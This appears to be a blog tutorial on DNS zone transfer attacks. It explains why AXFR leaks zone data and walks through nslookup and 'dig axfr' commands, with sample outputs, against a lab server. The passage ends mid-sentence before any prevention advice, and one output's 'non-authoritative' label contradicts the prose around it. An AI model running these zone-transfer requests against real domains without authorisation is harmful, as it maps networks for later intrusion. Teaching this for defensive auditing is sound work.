Understanding Zone Transfer Attacks in DNS
DNS (Domain Name System) is a critical component of the internet infrastructure that translates domain names into IP addresses. However, DNS servers are vulnerable to attacks, including zone transfer attacks. In a zone transfer attack, an attacker can obtain sensitive information about a DNS server’s zone data, which can be used to launch further attacks. In this blog post, we will discuss what zone transfer attacks are, how they work, and how to prevent them. We will also demonstrate how to perform a zone transfer attack using Kali Linux and Windows VM, along with the commands and outputs.
Origin of Attack
Zone transfers exist as a necessary function of DNS servers. They allow a secondary DNS server to replicate a primary DNS server’s zone data, ensuring that the DNS service remains available in case of a primary server failure. However, if not configured securely, zone transfers can be exploited by attackers to obtain sensitive information about a DNS server’s zone data, leading to severe consequences.
Zone transfer attacks take advantage of a weakness in DNS servers that allows them to share all their zone data with another DNS server. Hackers can use tools to identify which server is in charge of a domain and then request a zone transfer. When a zone transfer occurs, the DNS server shares all its data with the requesting server, including sensitive information like IP addresses, subdomains, and mail servers. This information can be used by the hacker to launch further attacks or gain unauthorized access to systems. To prevent these attacks, DNS administrators need to follow secure configurations and limit zone transfers to authorized servers.
Performing a Zone Transfer Attack: A Step-by-Step Guide
Using the “nslookup” command in Kali Linux to perform DNS enumeration:
$ nslookup -type=ns example.com 192.168.1.100
Server: 192.168.1.100
Address: 192.168.1.100#53
Non-authoritative answer:
example.com nameserver = ns1.example.com.
example.com nameserver = ns2.example.com.
Authoritative answers can be found from:
This output indicates that the target DNS server (192.168.1.100) is authoritative for the “example.com” domain, and provides the nameservers for the domain.
Using the “dig” command in Kali Linux to attempt a zone transfer:
$ dig axfr example.com @192.168.1.100
; <<>> DiG 9.11.5-P4-5.1+deb10u5-Debian <<>> axfr example.com @192.168.1.100
;; global options: +cmd
example.com. 86400 IN SOA ns1.example.com. admin.example.com. 2022030101 86400 7200 3600000 86400
example.com. 86400 IN NS ns1.example.com.
example.com. 86400 IN NS ns2.example.com.
www.example.com. 86400 IN A 192.168.1.200
mail.example.com. 86400 IN A 192.168.1.201
This output indicates that the zone transfer was successful and displays the full DNS zone data for the “example.com” domain, including domain names, IP addresses, and other DNS records.
Using the “nslookup” command in Windows to perform DNS enumeration:
C:\> nslookup -type=ns example.com 192.168.1.100
Server: dns.example.local
Address: 192.168.1.100
Non-authoritative answer:
example.com nameserver = ns1.example.com.
example.com nameserver = ns2.example.com.
Authoritative answers can be found from:
This output is similar to the output from the Kali Linux “nslookup” command and indicates that the target DNS server (192.168.1.100) is authoritative for the “example.com” domain, and provides the nameservers for the domain.
Using the “nslookup” command in Windows to attempt a zone transfer:
C:\> nslookup
Default Server: dns.example.local
Address: 192.168.1.100
> server 192.168.1.100
Default Server: dns.example.local
Address: 192.168.1.100
> set type=any
> ls -d example.com
[192.168.1.100]
example.com. SOA ns1.example.com. admin.example.com. 2022030101 86400 7200 3600000 86400
example.com. NS ns1.example.com.
example.com. NS ns2.example.com.
www.example.com. A 192.168.1.200
mail.example.com. A 192.168.1.201
This output is similar to the output from the Kali Linux “dig” command and indicates that the zone transfer was successful and displays the full DNS zone data for the “example.com” domain, including domain names, IP addresses, and other DNS